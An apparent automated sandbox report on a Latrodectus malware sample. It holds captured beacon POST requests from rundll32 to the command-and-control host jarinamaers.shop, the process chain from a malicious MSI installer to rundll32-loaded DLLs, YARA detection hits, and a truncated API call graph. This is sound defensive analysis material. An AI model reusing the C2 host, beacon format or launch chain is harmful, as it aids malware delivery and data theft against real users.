                                                                                  2024-04-25 20:44:44 UTC184OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 71 45 35 76 63 43 2f 48 57 43 62 45 64 32 4e 53 69 43 30 35 68 35 42 7a 42 68 39 43 6e 57 47 65 4e 4a 4d 72 33 37 43 41 75 74 4b 62 31 36 62 4d 4b 37 51 79 67 63 70 65 42 57 4c 55 55 66 73 39 46 6c 6f 50 4d 66 50 75 2b 39 73 4c 38 4b 58 7a 4a 63 68 4f 51 37 7a 4e 71 47 46 76 65 5a 53 63 6a 71 4c 63 4c 76 51 67 4a 47 67 59 57 79 52 47 52 6f 52 6c 6d 53 4e 43 2f 70 35 54 77 48 6d 6e 42 61 6c 43 6c 4e 76 6a 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4b 61 36 63 6c 46 4b 32 69 34 75 74 78 33 49 55 57 65 54 52 70 4d 3d
                                                                                  Data Ascii: YjOeEyiMk3RqE5vcC/HWCbEd2NSiC05h5BzBh9CnWGeNJMr37CAutKb16bMK7QygcpeBWLUUfs9FloPMfPu+9sL8KXzJchOQ7zNqGFveZScjqLcLvQgJGgYWyRGRoRlmSNC/p5TwHmnBalClNvj6CW2j80hj8qSvsKa6clFK2i4utx3IUWeTRpM=
                                                                                  2024-04-25 20:44:52 UTC578INHTTP/1.1 200 OK
                                                                                  Date: Thu, 25 Apr 2024 20:44:52 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qoApWU6emCaMTFqh4UFcKh%2FS4JgO8Dii0K%2FYH9m0gWk0v%2BgvJZNASctZuqrSNhOR6hQroIFKGClHpqj%2FA%2BcqCLq6ei1vhrusrbICB05QlBFwOib8aN%2Bs9lnG5V4UO9gSRhOp"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 87a12c3a0bf86753-ATL
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  2024-04-25 20:44:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  2192.168.2.649725104.21.46.754432224C:\Windows\System32\rundll32.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 20:44:53 UTC229OUTPOST /live/ HTTP/1.1
                                                                                  Accept: */*
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                  Host: jarinamaers.shop
                                                                                  Content-Length: 184
                                                                                  Cache-Control: no-cache
                                                                                  2024-04-25 20:44:53 UTC184OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 70 45 35 76 63 43 2f 48 57 43 62 45 64 32 4e 53 69 43 30 35 68 35 42 7a 42 68 39 43 6e 57 47 65 4e 4a 4d 72 33 37 43 41 75 74 4b 62 31 36 62 4d 4b 37 51 79 67 63 70 65 42 57 4c 55 55 66 73 39 46 6c 6f 50 4d 66 50 75 2b 39 73 4c 38 4b 58 7a 4a 63 68 4f 51 37 7a 4e 71 47 46 76 65 5a 53 63 6a 71 4c 63 4c 76 51 67 4a 47 67 59 57 79 52 47 52 6f 52 6c 6d 53 4e 43 2f 70 35 54 77 48 6d 6e 42 61 6c 43 6c 4e 76 6a 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4b 61 36 63 6c 46 4b 32 69 34 75 74 78 33 49 55 57 65 54 52 70 4d 3d
                                                                                  Data Ascii: YjOeEyiMk3RpE5vcC/HWCbEd2NSiC05h5BzBh9CnWGeNJMr37CAutKb16bMK7QygcpeBWLUUfs9FloPMfPu+9sL8KXzJchOQ7zNqGFveZScjqLcLvQgJGgYWyRGRoRlmSNC/p5TwHmnBalClNvj6CW2j80hj8qSvsKa6clFK2i4utx3IUWeTRpM=
                                                                                  2024-04-25 20:44:58 UTC572INHTTP/1.1 200 OK
                                                                                  Date: Thu, 25 Apr 2024 20:44:58 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o0oiwynJhUE%2BI0H8pxYueZx3GLsHpu8AYMcK3PpJeCweUR%2BKLzbiUwdw7DSQwuMHMzcc17q18vz5ioUV4PcHltl1GmHYnB%2B4wsI7i7HNxmwlttqBcrAMDqXhaBRynRmGd8sw"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 87a12c728952452d-ATL
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  2024-04-25 20:44:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  3192.168.2.649727104.21.46.754432224C:\Windows\System32\rundll32.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 20:44:58 UTC229OUTPOST /live/ HTTP/1.1
                                                                                  Accept: */*
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                  Host: jarinamaers.shop
                                                                                  Content-Length: 184
                                                                                  Cache-Control: no-cache
                                                                                  2024-04-25 20:44:58 UTC184OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 45 35 76 63 43 2f 48 57 43 62 45 64 32 4e 53 69 43 30 35 68 35 42 7a 42 68 39 43 6e 57 47 65 4e 4a 4d 72 33 37 43 41 75 74 4b 62 31 36 62 4d 4b 37 51 79 67 63 70 65 42 57 4c 55 55 66 73 39 46 6c 6f 50 4d 66 50 75 2b 39 73 4c 38 4b 58 7a 4a 63 68 4f 51 37 7a 4e 71 47 46 76 65 5a 53 63 6a 71 4c 63 4c 76 51 67 4a 47 67 59 57 79 52 47 52 6f 52 6c 6d 53 4e 43 2f 70 35 54 77 48 6d 6e 42 61 6c 43 6c 4e 76 6a 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4b 61 36 63 6c 46 4b 32 69 34 75 74 78 33 49 55 57 65 54 52 70 4d 3d
                                                                                  Data Ascii: YjOeEyiMk3RoE5vcC/HWCbEd2NSiC05h5BzBh9CnWGeNJMr37CAutKb16bMK7QygcpeBWLUUfs9FloPMfPu+9sL8KXzJchOQ7zNqGFveZScjqLcLvQgJGgYWyRGRoRlmSNC/p5TwHmnBalClNvj6CW2j80hj8qSvsKa6clFK2i4utx3IUWeTRpM=
                                                                                  2024-04-25 20:45:09 UTC578INHTTP/1.1 200 OK
                                                                                  Date: Thu, 25 Apr 2024 20:45:09 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n2O1M%2B%2BlDSMZ70P7mGcanKu9P4jPp4FqQ4Fy7MEyGlbySv7Ne7%2FF34qYCLE0WxJv%2BMovO%2FAnTpnkuOm6YuV7YyVQQGXm7iz83n7gjxE39Jsv3HEYG12fgkk%2Bbz4IF57ENlj0"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 87a12c957da61877-ATL
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  2024-04-25 20:45:09 UTC162INData Raw: 39 63 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 69 7a 64 35 5a 48 39 71 74 56 32 58 35 45 38 74 46 4a 69 39 2b 4d 6e 69 58 44 36 41 4a 55 75 7a 5a 4f 2b 2b 42 47 72 63 6e 41 3d 3d 0d 0a
                                                                                  Data Ascii: 9cQhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhuizd5ZH9qtV2X5E8tFJi9+MniXD6AJUuzZO++BGrcnA==
                                                                                  2024-04-25 20:45:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Click to jump to process

                                                                                  Click to jump to process

                                                                                  Click to dive into process behavior distribution

                                                                                  Click to jump to process

                                                                                  Target ID:0
                                                                                  Start time:22:42:57
                                                                                  Start date:25/04/2024
                                                                                  Path:C:\Windows\System32\msiexec.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\ad.msi"
                                                                                  Imagebase:0x7ff6b2ca0000
                                                                                  File size:69'632 bytes
                                                                                  MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:2
                                                                                  Start time:22:42:58
                                                                                  Start date:25/04/2024
                                                                                  Path:C:\Windows\System32\msiexec.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                  Imagebase:0x7ff6b2ca0000
                                                                                  File size:69'632 bytes
                                                                                  MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:false

                                                                                  Target ID:3
                                                                                  Start time:22:42:58
                                                                                  Start date:25/04/2024
                                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding CFBB24A404B21769C19C85B2027D69FC C
                                                                                  Imagebase:0x460000
                                                                                  File size:59'904 bytes
                                                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:4
                                                                                  Start time:22:42:59
                                                                                  Start date:25/04/2024
                                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 02B62BF455D61FC50D15E7A41AF45BC1
                                                                                  Imagebase:0x460000
                                                                                  File size:59'904 bytes
                                                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:5
                                                                                  Start time:22:42:59
                                                                                  Start date:25/04/2024
                                                                                  Path:C:\Windows\Installer\MSIB6D3.tmp
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\Installer\MSIB6D3.tmp" C:/Windows/System32/rundll32.exe C:\Users\user\AppData\Local\sharepoint\360total.dll, homq
                                                                                  Imagebase:0xb30000
                                                                                  File size:399'328 bytes
                                                                                  MD5 hash:B9545ED17695A32FACE8C3408A6A3553
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Antivirus matches:
                                                                                  • Detection: 0%, ReversingLabs
                                                                                  Reputation:moderate
                                                                                  Has exited:true

                                                                                  Target ID:6
                                                                                  Start time:22:43:00
                                                                                  Start date:25/04/2024
                                                                                  Path:C:\Windows\System32\rundll32.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\sharepoint\360total.dll, homq
                                                                                  Imagebase:0x7ff6cb1a0000
                                                                                  File size:71'680 bytes
                                                                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000006.00000002.2113159787.0000026387CF0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000006.00000002.2113131628.0000026387CE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:7
                                                                                  Start time:22:43:00
                                                                                  Start date:25/04/2024
                                                                                  Path:C:\Windows\System32\rundll32.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_71a2ec86.dll", homq
                                                                                  Imagebase:0x7ff6cb1a0000
                                                                                  File size:71'680 bytes
                                                                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000007.00000003.3230953855.000002095BA10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000007.00000003.2974432949.000002095BA10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000007.00000002.3348940328.000002095B810000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000007.00000002.3349009831.000002095BA10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000007.00000002.3348957722.000002095B820000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000007.00000003.3287402342.000002095BA10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000007.00000003.3130529388.000002095BDE0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000007.00000002.3348028990.000000E23987A000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:high
                                                                                  Has exited:false

                                                                                  Target ID:8
                                                                                  Start time:22:43:02
                                                                                  Start date:25/04/2024
                                                                                  Path:C:\Windows\System32\rundll32.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_71a2ec86.dll", homq
                                                                                  Imagebase:0x7ff6cb1a0000
                                                                                  File size:71'680 bytes
                                                                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000008.00000002.2135345986.000002268D6C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000008.00000002.2135365322.000002268D6D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Reset < >

                                                                                    Execution Graph

                                                                                    Execution Coverage:3%
                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                    Signature Coverage:17.3%
                                                                                    Total number of Nodes:1093
                                                                                    Total number of Limit Nodes:16
                                                                                    execution_graph 33110 b53084 33111 b53090 __FrameHandler3::FrameUnwindToState 33110->33111 33136 b52de4 33111->33136 33113 b53097 33114 b531ea 33113->33114 33125 b530c1 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock std::locale::_Setgloballocale 33113->33125 33170 b533a8 4 API calls 2 library calls 33114->33170 33116 b531f1 33171 b62ed9 23 API calls std::locale::_Setgloballocale 33116->33171 33118 b531f7 33172 b62e9d 23 API calls std::locale::_Setgloballocale 33118->33172 33120 b531ff 33121 b530e0 33122 b53161 33147 b534c3 GetStartupInfoW _Getvals 33122->33147 33124 b53167 33148 b3cdb0 GetCommandLineW 33124->33148 33125->33121 33125->33122 33169 b62eb3 41 API calls 3 library calls 33125->33169 33137 b52ded 33136->33137 33173 b535a9 IsProcessorFeaturePresent 33137->33173 33139 b52df9 33174 b558dc 10 API calls 2 library calls 33139->33174 33141 b52dfe 33146 b52e02 33141->33146 33175 b6393e 33141->33175 33144 b52e19 33144->33113 33146->33113 33147->33124 33149 b3cdf8 33148->33149 33234 b31f80 LocalAlloc 33149->33234 33151 b3ce09 33235 b369a0 33151->33235 33153 b3ce58 33154 b3ce69 33153->33154 33155 b3ce5c 33153->33155 33243 b3c6a0 LocalAlloc LocalAlloc 33154->33243 33325 b36600 98 API calls __ehhandler$___std_fs_copy_file@12 33155->33325 33158 b3ce72 33244 b3c870 33158->33244 33159 b3ce65 33161 b3ceb0 ExitProcess 33159->33161 33165 b3cea4 33327 b3cec0 LocalFree LocalFree 33165->33327 33166 b3ce9a 33326 b3cce0 CreateFileW SetFilePointer WriteFile CloseHandle 33166->33326 33169->33122 33170->33116 33171->33118 33172->33120 33173->33139 33174->33141 33179 b6bedb 33175->33179 33178 b558fb 7 API calls 2 library calls 33178->33146 33180 b6beeb 33179->33180 33181 b52e0b 33179->33181 33180->33181 33183 b66d2d 33180->33183 33181->33144 33181->33178 33184 b66d39 __FrameHandler3::FrameUnwindToState 33183->33184 33195 b61c9a EnterCriticalSection 33184->33195 33186 b66d40 33196 b6c4cc 33186->33196 33189 b66d5e 33211 b66d84 LeaveCriticalSection std::_Lockit::~_Lockit 33189->33211 33192 b66d59 33210 b66c7d GetStdHandle GetFileType 33192->33210 33193 b66d6f 33193->33180 33195->33186 33197 b6c4d8 __FrameHandler3::FrameUnwindToState 33196->33197 33198 b6c502 33197->33198 33199 b6c4e1 33197->33199 33212 b61c9a EnterCriticalSection 33198->33212 33220 b57370 14 API calls __dosmaperr 33199->33220 33202 b6c4e6 33221 b57017 41 API calls __cftoe 33202->33221 33204 b66d4f 33204->33189 33209 b66bc7 44 API calls 33204->33209 33205 b6c53a 33222 b6c561 LeaveCriticalSection std::_Lockit::~_Lockit 33205->33222 33207 b6c50e 33207->33205 33213 b6c41c 33207->33213 33209->33192 33210->33189 33211->33193 33212->33207 33223 b670bb 33213->33223 33215 b6c43b 33231 b653b8 14 API calls 2 library calls 33215->33231 33216 b6c42e 33216->33215 33230 b6776f 6 API calls std::_Lockit::_Lockit 33216->33230 33219 b6c490 33219->33207 33220->33202 33221->33204 33222->33204 33228 b670c8 std::_Locinfo::_W_Getmonths 33223->33228 33224 b67108 33233 b57370 14 API calls __dosmaperr 33224->33233 33225 b670f3 RtlAllocateHeap 33227 b67106 33225->33227 33225->33228 33227->33216 33228->33224 33228->33225 33232 b6bf83 EnterCriticalSection LeaveCriticalSection std::_Locinfo::_W_Getmonths 33228->33232 33230->33216 33231->33219 33232->33228 33233->33227 33234->33151 33236 b369f2 33235->33236 33237 b36a34 33236->33237 33240 b36a22 33236->33240 33238 b52937 __ehhandler$___std_fs_copy_file@12 5 API calls 33237->33238 33239 b36a42 33238->33239 33239->33153 33328 b52937 33240->33328 33242 b36a30 33242->33153 33243->33158 33246 b3c889 33244->33246 33249 b3cb32 33244->33249 33245 b3cb92 33336 b36250 14 API calls 33245->33336 33246->33245 33246->33249 33248 b3cba2 RegOpenKeyExW 33248->33249 33250 b3cbc0 RegQueryValueExW 33248->33250 33251 b36a50 33249->33251 33250->33249 33252 b36aa3 GetCurrentProcess OpenProcessToken 33251->33252 33253 b36a84 33251->33253 33257 b36b09 33252->33257 33269 b36adf 33252->33269 33254 b52937 __ehhandler$___std_fs_copy_file@12 5 API calls 33253->33254 33255 b36a9f 33254->33255 33255->33165 33255->33166 33337 b35de0 33257->33337 33258 b36b02 33385 b357c0 GetCurrentProcess OpenProcessToken 33258->33385 33259 b36af4 CloseHandle 33259->33258 33263 b36b20 33265 b31770 42 API calls 33263->33265 33264 b36b2e 33266 b36b32 33264->33266 33267 b36b3f 33264->33267 33265->33269 33270 b31770 42 API calls 33266->33270 33340 b35f40 ConvertSidToStringSidW 33267->33340 33268 b36ddb 33273 b32310 56 API calls 33268->33273 33269->33258 33269->33259 33270->33269 33272 b36c29 33272->33268 33276 b36c43 33272->33276 33277 b36e04 33273->33277 33390 b32310 33276->33390 33278 b36d8a 33277->33278 33283 b346f0 52 API calls 33277->33283 33524 b311d0 RaiseException Concurrency::cancel_current_task 33278->33524 33292 b36e29 33283->33292 33284 b36b85 33371 b32e60 33284->33371 33287 b36e59 33290 b32310 56 API calls 33287->33290 33288 b32e60 42 API calls 33291 b36bf5 33288->33291 33293 b36e68 33290->33293 33377 b31770 33291->33377 33292->33287 33474 b34ac0 42 API calls 3 library calls 33292->33474 33293->33278 33303 b346f0 52 API calls 33293->33303 33295 b36cad 33296 b32310 56 API calls 33295->33296 33301 b36cc7 33296->33301 33299 b36c16 FindCloseChangeNotification 33299->33258 33300 b36c7c 33300->33295 33471 b34ac0 42 API calls 3 library calls 33300->33471 33301->33278 33305 b346f0 52 API calls 33301->33305 33307 b36e8a 33303->33307 33304 b36eb9 33306 b32310 56 API calls 33304->33306 33312 b36ce9 33305->33312 33308 b36ec4 33306->33308 33307->33304 33475 b34ac0 42 API calls 3 library calls 33307->33475 33308->33278 33315 b346f0 52 API calls 33308->33315 33309 b36d19 33310 b32310 56 API calls 33309->33310 33313 b36d24 33310->33313 33312->33309 33472 b34ac0 42 API calls 3 library calls 33312->33472 33313->33278 33317 b346f0 52 API calls 33313->33317 33319 b36ee6 33315->33319 33316 b36f10 33477 b352f0 33316->33477 33323 b36d46 33317->33323 33319->33316 33476 b34ac0 42 API calls 3 library calls 33319->33476 33320 b36d70 33425 b34ba0 33320->33425 33323->33320 33323->33323 33473 b34ac0 42 API calls 3 library calls 33323->33473 33325->33159 33326->33165 33327->33161 33329 b52940 IsProcessorFeaturePresent 33328->33329 33330 b5293f 33328->33330 33332 b529a5 33329->33332 33330->33242 33335 b52968 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 33332->33335 33334 b52a88 33334->33242 33335->33334 33336->33248 33525 b35e40 GetTokenInformation 33337->33525 33341 b35fd2 33340->33341 33343 b35fac 33340->33343 33342 b324c0 47 API calls 33341->33342 33344 b35fc9 33342->33344 33345 b324c0 47 API calls 33343->33345 33346 b36003 33344->33346 33347 b35ff5 LocalFree 33344->33347 33345->33344 33348 b324c0 33346->33348 33347->33346 33349 b324fd 33348->33349 33353 b324d1 _Yarn 33348->33353 33350 b325f5 33349->33350 33351 b32515 33349->33351 33355 b325f0 33349->33355 33359 b32582 33349->33359 33536 b32770 42 API calls 33350->33536 33351->33355 33356 b32566 LocalAlloc 33351->33356 33353->33284 33354 b325fa 33537 b57027 41 API calls 2 library calls 33354->33537 33535 b32d70 RaiseException Concurrency::cancel_current_task 33355->33535 33356->33354 33361 b32577 33356->33361 33364 b32586 LocalAlloc 33359->33364 33368 b32593 _Yarn 33359->33368 33361->33368 33364->33368 33367 b325e5 33367->33284 33368->33354 33368->33367 33369 b325d8 33368->33369 33369->33367 33370 b325de LocalFree 33369->33370 33370->33367 33372 b32eb7 33371->33372 33373 b32e8d 33371->33373 33372->33288 33373->33371 33374 b32eaa 33373->33374 33538 b57027 41 API calls 2 library calls 33373->33538 33374->33372 33375 b32eb0 LocalFree 33374->33375 33375->33372 33378 b317c1 33377->33378 33379 b3179b 33377->33379 33378->33258 33378->33299 33380 b317ba LocalFree 33379->33380 33381 b317e5 33379->33381 33382 b317b4 33379->33382 33380->33378 33539 b57027 41 API calls 2 library calls 33381->33539 33382->33378 33382->33380 33386 b357e1 33385->33386 33387 b357e7 GetTokenInformation 33385->33387 33386->33272 33388 b35816 33387->33388 33389 b3581e CloseHandle 33387->33389 33388->33389 33389->33272 33391 b32348 33390->33391 33403 b3239c 33390->33403 33540 b52c98 6 API calls 33391->33540 33393 b32352 33395 b3235e GetProcessHeap 33393->33395 33393->33403 33541 b52faa 44 API calls 33395->33541 33396 b323b6 33404 b32427 33396->33404 33544 b52faa 44 API calls 33396->33544 33399 b3238b 33542 b52c4e EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 33399->33542 33400 b32416 33545 b52c4e EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 33400->33545 33403->33404 33543 b52c98 6 API calls 33403->33543 33404->33278 33405 b346f0 33404->33405 33406 b34700 33405->33406 33407 b34766 33405->33407 33406->33407 33546 b3d156 RaiseException EnterCriticalSection LeaveCriticalSection EnterCriticalSection LeaveCriticalSection 33406->33546 33407->33300 33409 b34730 FindResourceExW 33412 b3471a 33409->33412 33412->33407 33412->33409 33413 b34771 33412->33413 33547 b345b0 LoadResource LockResource SizeofResource 33412->33547 33548 b3d156 RaiseException EnterCriticalSection LeaveCriticalSection EnterCriticalSection LeaveCriticalSection 33412->33548 33413->33407 33414 b34775 FindResourceW 33413->33414 33414->33407 33415 b34783 33414->33415 33549 b345b0 LoadResource LockResource SizeofResource 33415->33549 33417 b34790 33417->33407 33550 b57383 41 API calls 3 library calls 33417->33550 33419 b347d1 33551 b34650 RaiseException 33419->33551 33421 b347d7 33422 b347e2 33421->33422 33552 b311d0 RaiseException Concurrency::cancel_current_task 33421->33552 33422->33300 33426 b357c0 4 API calls 33425->33426 33427 b34bed 33426->33427 33428 b34bf3 33427->33428 33429 b34c15 CoInitialize CoCreateInstance 33427->33429 33430 b352f0 89 API calls 33428->33430 33431 b34c58 VariantInit 33429->33431 33432 b34c4f 33429->33432 33433 b34c0d 33430->33433 33434 b34c9e 33431->33434 33432->33433 33435 b35187 CoUninitialize 33432->33435 33436 b52937 __ehhandler$___std_fs_copy_file@12 5 API calls 33433->33436 33437 b34cb1 IUnknown_QueryService 33434->33437 33445 b34ca8 VariantClear 33434->33445 33435->33433 33438 b351a7 33436->33438 33440 b34ce0 33437->33440 33437->33445 33438->33278 33441 b34d31 IUnknown_QueryInterface_Proxy 33440->33441 33440->33445 33442 b34d5a 33441->33442 33441->33445 33443 b34d7f IUnknown_QueryInterface_Proxy 33442->33443 33442->33445 33444 b34da8 CoAllowSetForegroundWindow 33443->33444 33443->33445 33446 b34dc2 SysAllocString 33444->33446 33447 b34e28 SysAllocString 33444->33447 33445->33432 33450 b34df8 SysAllocString 33446->33450 33451 b34def 33446->33451 33447->33446 33449 b351b0 _com_issue_error 33447->33449 33602 b311d0 RaiseException Concurrency::cancel_current_task 33449->33602 33453 b34e3d VariantInit 33450->33453 33454 b34e1d 33450->33454 33451->33449 33451->33450 33465 b34ebd 33453->33465 33454->33449 33454->33453 33456 b34ec1 VariantClear VariantClear VariantClear VariantClear SysFreeString 33456->33445 33458 b324c0 47 API calls 33458->33465 33461 b32e60 42 API calls 33461->33465 33462 b34fd5 OpenProcess WaitForSingleObject 33464 b3500b GetExitCodeProcess 33462->33464 33462->33465 33463 b34fc5 33463->33462 33600 b34270 10 API calls 33463->33600 33464->33465 33465->33456 33465->33458 33465->33461 33465->33462 33465->33463 33467 b35025 CloseHandle 33465->33467 33468 b351ab 33465->33468 33469 b3506e LocalFree 33465->33469 33553 b312f0 33465->33553 33577 b33860 CreateToolhelp32Snapshot 33465->33577 33467->33465 33601 b57027 41 API calls 2 library calls 33468->33601 33469->33465 33471->33295 33472->33309 33473->33320 33474->33287 33475->33304 33476->33316 33478 b35361 33477->33478 34362 b35d30 33478->34362 33480 b3537b 33481 b35d30 41 API calls 33480->33481 33482 b3538b 33481->33482 34366 b359c0 33482->34366 33484 b357b0 34385 b311d0 RaiseException Concurrency::cancel_current_task 33484->34385 33486 b3539b 33486->33484 34374 b57852 33486->34374 33490 b353e1 33491 b35d30 41 API calls 33490->33491 33507 b353f5 33491->33507 33492 b354cc 33493 b3551d GetForegroundWindow 33492->33493 33498 b35529 33492->33498 33493->33498 33494 b355f7 ShellExecuteExW 33495 b35612 33494->33495 33496 b35609 33494->33496 33500 b35646 33495->33500 33501 b35625 ShellExecuteExW 33495->33501 34383 b35890 6 API calls 33496->34383 33497 b35493 GetWindowsDirectoryW 34381 b35b10 70 API calls 33497->34381 33498->33494 33498->33498 33505 b356fd 33500->33505 33506 b3566c GetModuleHandleW GetProcAddress 33500->33506 33501->33500 33503 